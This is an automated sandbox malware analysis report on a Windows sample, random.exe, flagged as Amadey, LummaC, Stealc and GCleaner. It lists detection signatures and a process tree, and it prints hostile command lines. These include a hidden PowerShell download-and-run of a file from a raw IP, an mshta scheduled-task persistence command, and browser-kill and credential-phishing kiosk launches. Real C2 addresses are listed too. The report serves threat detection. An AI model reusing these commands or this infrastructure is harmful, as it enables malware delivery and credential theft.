Edit tour

Windows Analysis Report
random.exe

Overview

General Information

Sample name:	random.exe
Analysis ID:	1627193
MD5:	a92d6465d69430b38cbc16bf1c6a7210
SHA1:	421fadebee484c9d19b9cb18faf3b0f5d9b7a554
SHA256:	3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77
Tags:	092155Amadeyexeuser-aachum
Infos:

Detection

Amadey, Credential Flusher, GCleaner, LummaC Stealer, Stealc

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Powershell download and execute file

Suricata IDS alerts for network traffic

Yara detected Amadey

Yara detected Amadeys Clipper DLL

Yara detected Credential Flusher

Yara detected GCleaner

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected obfuscated html page

Allocates memory in foreign processes

Binary is likely a compiled AutoIt script file

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Contains functionality to start a terminal service

Creates HTA files

Creates multiple autostart registry keys

Disable Windows Defender notifications (registry)

Disable Windows Defender real time protection (registry)

Disables Windows Defender Tamper protection

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Modifies windows update settings

PE file contains section with special chars

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: PowerShell DownloadFile

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: Suspicious Script Execution From Temp Folder

Suspicious powershell command line found

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to download and execute files (via powershell)

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Searches for user specific document files

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: PowerShell Download Pattern

Sigma detected: PowerShell Web Download

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: Usage Of Web Request Commands And Cmdlets

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Uses taskkill to terminate processes

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

random.exe (PID: 4568 cmdline: "C:\Users\user\Desktop\random.exe" MD5: A92D6465D69430B38CBC16BF1C6A7210)

rapes.exe (PID: 3820 cmdline: "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe" MD5: A92D6465D69430B38CBC16BF1C6A7210)

rapes.exe (PID: 1416 cmdline: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe MD5: A92D6465D69430B38CBC16BF1C6A7210)

9f19f13091.exe (PID: 6508 cmdline: "C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe" MD5: 60DD2030E1FF1F9A3406DDC438893694)

9f19f13091.exe (PID: 6524 cmdline: "C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe" MD5: 60DD2030E1FF1F9A3406DDC438893694)

9f19f13091.exe (PID: 3136 cmdline: "C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe" MD5: 60DD2030E1FF1F9A3406DDC438893694)

WerFault.exe (PID: 2324 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6508 -s 796 MD5: C31336C1EFC2CCB44B4326EA793040F2)

5a20b6327b.exe (PID: 5900 cmdline: "C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe" MD5: B0843B9D12EFF1F77EA88D213E782403)

1e8e57d62a.exe (PID: 1916 cmdline: "C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe" MD5: F9186B4D7933577CAEDE0225483636A7)

dd662b5386.exe (PID: 5032 cmdline: "C:\Users\user\AppData\Local\Temp\10060290101\dd662b5386.exe" MD5: E56E0DA39D4FCE908B4552BF222D3ADD)

BitLockerToGo.exe (PID: 5944 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)

dbe8776a6a.exe (PID: 3200 cmdline: "C:\Users\user\AppData\Local\Temp\10060300101\dbe8776a6a.exe" MD5: C10CB2378CBC21919D1C93B0AB278090)

BitLockerToGo.exe (PID: 880 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)

186adf2617.exe (PID: 5276 cmdline: "C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe" MD5: 1E2DB2E93A88B96539C82DBFEAF43CF9)

O5B9GD1ATV6RLTMC0ANGDNKXPTNV.exe (PID: 4896 cmdline: "C:\Users\user\AppData\Local\Temp\O5B9GD1ATV6RLTMC0ANGDNKXPTNV.exe" MD5: A92D6465D69430B38CBC16BF1C6A7210)

43a79b4335.exe (PID: 3656 cmdline: "C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe" MD5: AD01AE98960E11F8F7DFA4FD4D913859)

40c4d92e87.exe (PID: 6712 cmdline: "C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe" MD5: EF959BAC1084C904AD73BE0925C78626)

taskkill.exe (PID: 3708 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 5164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 1880 cmdline: taskkill /F /IM chrome.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 5912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 3648 cmdline: taskkill /F /IM msedge.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 7012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 7008 cmdline: taskkill /F /IM opera.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 7076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 1908 cmdline: taskkill /F /IM brave.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 5196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

firefox.exe (PID: 3640 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cefa09b2a4.exe (PID: 716 cmdline: "C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe" MD5: 65827043695689F679ED42AD4D06D2CE)

977b4d66ef.exe (PID: 3792 cmdline: "C:\Users\user\AppData\Local\Temp\10060350101\977b4d66ef.exe" MD5: 079CC083EF66F2D0489FA36552B15A09)

cmd.exe (PID: 3564 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn pE6zJmaLr3c /tr "mshta C:\Users\user\AppData\Local\Temp\0uDicgVYv.hta" /sc minute /mo 25 /ru "user" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 6720 cmdline: schtasks /create /tn pE6zJmaLr3c /tr "mshta C:\Users\user\AppData\Local\Temp\0uDicgVYv.hta" /sc minute /mo 25 /ru "user" /f MD5: 48C2FE20575769DE916F48EF0676A965)

mshta.exe (PID: 7024 cmdline: mshta C:\Users\user\AppData\Local\Temp\0uDicgVYv.hta MD5: 06B02D5C097C7DB1F109749C45F3F505)

powershell.exe (PID: 4568 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NLDQJWO4P0JKZKGQIFPHKJAJP3FG2MC9.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 3428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

186adf2617.exe (PID: 3404 cmdline: "C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe" MD5: 1E2DB2E93A88B96539C82DBFEAF43CF9)

firefox.exe (PID: 6908 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 936 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 4276 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2288 -parentBuildID 20230927232528 -prefsHandle 2212 -prefMapHandle 2208 -prefsLen 25250 -prefMapSize 238690 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f4234fd1-1ff5-4258-96b2-dd84d36c1391} 936 "\\.\pipe\gecko-crash-server-pipe.936" 20f7786dd10 socket MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 6492 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4160 -parentBuildID 20230927232528 -prefsHandle 3584 -prefMapHandle 4240 -prefsLen 26265 -prefMapSize 238690 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a9aaf8ba-a9e7-435b-8569-42d4f3a4288a} 936 "\\.\pipe\gecko-crash-server-pipe.936" 20f08395210 rdd MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

43a79b4335.exe (PID: 5320 cmdline: "C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe" MD5: AD01AE98960E11F8F7DFA4FD4D913859)

40c4d92e87.exe (PID: 6628 cmdline: "C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe" MD5: EF959BAC1084C904AD73BE0925C78626)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
GCleaner		No Attribution	https://bazaar.abuse.ch/browse/signature/GCleaner/ https://github.com/VenzoV/MalwareAnalysisReports/blob/main/GCleaner/GCleaner%20Techincal%20Analysis%20with%20BinaryNinja.md https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145 https://n1ght-w0lf.github.io/malware%20analysis/gcleaner-loader/ https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/	https://malpedia.caad.fkie.fraunhofer.de/details/win.gcleaner

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.lexfo.fr/StealC_malware_analysis_part1.html https://blog.lexfo.fr/StealC_malware_analysis_part2.html https://blog.lexfo.fr/StealC_malware_analysis_part3.html https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://45.93.20.28/85a1cacf11314eb8.php", "Botnet": "trump"}

Threatname: LummaC

{"C2 url": ["exarthynature.run", "uncertainyelemz.bet", "hobbyedsmoker.live", "presentymusse.world", "deaddereaste.today", "subawhipnator.life", "privileggoe.live", "boltetuurked.digital"], "Build id": "FATE99--test"}

Threatname: Amadey

{"C2 url": "176.113.115.6/Ni9kiput/index.php", "Version": "5.21", "Install Folder": "bb556cff4a", "Install File": "rapes.exe"}

Threatname: GCleaner

{"C2 addresses": ["185.156.73.73", "45.91.200.135"]}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
random.exe	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security

PCAP (Network Traffic)

Source	Rule	Description	Author
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Users\user\AppData\Local\Temp\0uDicgVYv.hta	JoeSecurity_Obshtml	Yara detected obfuscated html page	Joe Security
C:\Users\user\AppData\Local\Temp\O5B9GD1ATV6RLTMC0ANGDNKXPTNV.exe	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000023.00000002.2908473776.0000000000EA1000.00000040.00000001.01000000.00000014.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000000F.00000002.2728858042.000000000E03A000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
00000004.00000002.2280248529.0000000003529000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0000000B.00000002.2456390039.00000000004A1000.00000040.00000001.01000000.0000000F.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000010.00000002.2984395699.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
0000000E.00000003.2588966469.000000000E496000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
0000000B.00000003.2409337791.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000002.2729419667.000000000E11E000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
0000000E.00000002.2623904415.000000000E332000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
00000014.00000003.2883656017.0000000001682000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000002.2623904415.000000000E284000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
00000013.00000002.2770927261.00000000015AE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000023.00000003.2859283986.0000000004AE0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000000F.00000002.2727875020.000000000DEB0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
0000000C.00000002.2647212161.0000000000DF1000.00000040.00000001.01000000.00000010.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0000000E.00000002.2623904415.000000000E3C2000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
0000000B.00000003.2385182968.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000002.2727875020.000000000DEDC000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
0000000F.00000002.2727875020.000000000DE84000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
0000000B.00000003.2400766186.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000012.00000002.3075849533.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
0000000E.00000002.2623904415.000000000E2B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
0000000E.00000002.2625220408.000000000E4A6000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
00000011.00000002.2928007438.00000000008E1000.00000040.00000001.01000000.00000013.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0000000E.00000002.2622048225.000000000E12A000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
00000013.00000003.2720138631.00000000052D0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000000F.00000002.2727875020.000000000DE2C000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
0000000E.00000002.2623904415.000000000E22C000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
0000000C.00000003.2383837159.0000000004950000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0000000F.00000002.2727875020.000000000DF32000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
0000000E.00000002.2623904415.000000000E2DC000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
00000014.00000003.2885090861.0000000001622000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000013.00000002.2761501822.0000000000EA1000.00000040.00000001.01000000.00000014.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000014.00000002.2965760104.00000000008E1000.00000040.00000001.01000000.00000013.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000023.00000002.2903358595.00000000006BB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000000E.00000002.2623904415.000000000E258000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
0000000F.00000003.2695143135.000000000E10E000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
0000000F.00000002.2727875020.000000000DE58000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
0000000F.00000002.2723992031.000000000DD22000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
0000000C.00000003.2514450674.0000000000739000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.2270658684.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 9f19f13091.exe PID: 3136	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 5a20b6327b.exe PID: 5900	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 5a20b6327b.exe PID: 5900	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 5a20b6327b.exe PID: 5900	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 1e8e57d62a.exe PID: 1916	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 1e8e57d62a.exe PID: 1916	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 1e8e57d62a.exe PID: 1916	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 186adf2617.exe PID: 5276	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 186adf2617.exe PID: 5276	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 186adf2617.exe PID: 5276	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 43a79b4335.exe PID: 3656	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 43a79b4335.exe PID: 3656	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: 186adf2617.exe PID: 3404	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 186adf2617.exe PID: 3404	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 186adf2617.exe PID: 3404	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 40c4d92e87.exe PID: 6712	JoeSecurity_CredentialFlusher	Yara detected Credential Flusher	Joe Security
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security
Click to see the 54 entries

Unpacked PEs

Source	Rule	Description	Author
15.2.dbe8776a6a.exe.de84000.2.raw.unpack	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
15.2.dbe8776a6a.exe.de2c000.3.raw.unpack	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
14.2.dd662b5386.exe.e4a6000.6.raw.unpack	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
15.2.dbe8776a6a.exe.de58000.4.raw.unpack	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
4.2.9f19f13091.exe.3529550.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
15.2.dbe8776a6a.exe.e11e000.6.raw.unpack	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
14.2.dd662b5386.exe.e2b0000.3.raw.unpack	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
15.3.dbe8776a6a.exe.e11e000.0.raw.unpack	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
15.2.dbe8776a6a.exe.deb0000.1.raw.unpack	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
14.3.dd662b5386.exe.e4a6000.0.raw.unpack	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
16.2.BitLockerToGo.exe.400000.0.raw.unpack	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
14.2.dd662b5386.exe.e284000.2.raw.unpack	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
18.2.BitLockerToGo.exe.400000.0.raw.unpack	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
18.2.BitLockerToGo.exe.400000.0.unpack	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
1.0.rapes.exe.b30000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
0.0.random.exe.9b0000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
39.2.O5B9GD1ATV6RLTMC0ANGDNKXPTNV.exe.270000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
14.2.dd662b5386.exe.e22c000.4.raw.unpack	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
2.0.rapes.exe.b30000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
14.2.dd662b5386.exe.e258000.5.raw.unpack	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
39.0.O5B9GD1ATV6RLTMC0ANGDNKXPTNV.exe.270000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
16.2.BitLockerToGo.exe.400000.0.unpack	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
2.2.rapes.exe.b30000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
6.2.9f19f13091.exe.400000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
1.2.rapes.exe.b30000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
6.2.9f19f13091.exe.400000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0.2.random.exe.9b0000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
20.2.186adf2617.exe.8e0000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
11.2.5a20b6327b.exe.4a0000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
17.2.186adf2617.exe.8e0000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
Click to see the 25 entries

Other

Source	Rule	Description	Author	Strings
amsi32_4568.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Sigma Signatures

System Summary

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Source: Process started

